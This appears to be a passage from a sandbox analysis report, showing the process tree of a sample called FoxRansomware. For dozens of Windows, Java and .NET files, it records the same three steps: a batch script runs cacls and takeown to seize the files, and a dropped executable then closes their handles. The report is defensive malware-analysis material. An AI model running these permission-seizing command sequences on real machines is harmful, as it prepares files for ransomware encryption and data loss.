C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""2⤵PID:976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "classes.jsa" -nobanner3⤵PID:3784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵PID:3260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:5276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵PID:7004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "store.db" -nobanner3⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:3508
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""2⤵PID:6588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C3⤵PID:4576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"3⤵PID:5944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ActivitiesCache.db" -nobanner3⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "ActivitiesCache.db" -nobanner4⤵
- Executes dropped EXE
PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""2⤵PID:5964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C3⤵PID:5820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "AssemblyList_4_client.xml" -nobanner3⤵PID:7600
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "AssemblyList_4_client.xml" -nobanner4⤵
- Executes dropped EXE
PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:6612
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:2476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "behavior.xml" -nobanner3⤵PID:5064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:6440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:3320
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:2500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:7192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:5432
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:6100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵
- Executes dropped EXE
PID:6272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:6248
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:6192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵PID:7248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:3116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:696
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:7296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:7364
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:7480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:7636
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:7336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:7960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵
- Executes dropped EXE
PID:8044
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:8048
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:7892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵
- Executes dropped EXE
PID:7732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7932
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:7936
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:7988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:8000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:8016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:8108
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:8176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:5476
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""2⤵PID:3180
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:6952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:6720
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:6708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:6676
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:6544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:6428
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""2⤵PID:6504
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C3⤵PID:6752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftWordpad.xml" -nobanner3⤵PID:6784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftWordpad.xml" -nobanner4⤵
- Executes dropped EXE
PID:7028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl""2⤵PID:6920
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl" /E /G Admin:F /C3⤵PID:6452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl" -nobanner3⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "UpdateSessionOrchestration.f39419d7-fee1-4061-b801-e582d33b9647.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:6780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:6088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵PID:6412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "classes.jsa" -nobanner3⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:6424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl""2⤵PID:4532
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl" /E /G Admin:F /C3⤵PID:7144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl" -nobanner3⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "UpdateSessionOrchestration.4df740cc-d8be-464b-aea5-9e878c7f4bd3.1.etl" -nobanner4⤵
- Executes dropped EXE
PID:7416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C3⤵PID:2464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"3⤵PID:6028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "AssemblyList_4_extended.xml" -nobanner3⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "AssemblyList_4_extended.xml" -nobanner4⤵
- Executes dropped EXE
PID:2984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:5260
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:5632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:3168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "watermark.png" -nobanner3⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "watermark.png" -nobanner4⤵
- Executes dropped EXE
PID:3596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:5340
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:6136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner3⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:4984
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:2352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:6152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:5172
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:7268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵PID:7224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:8116
-
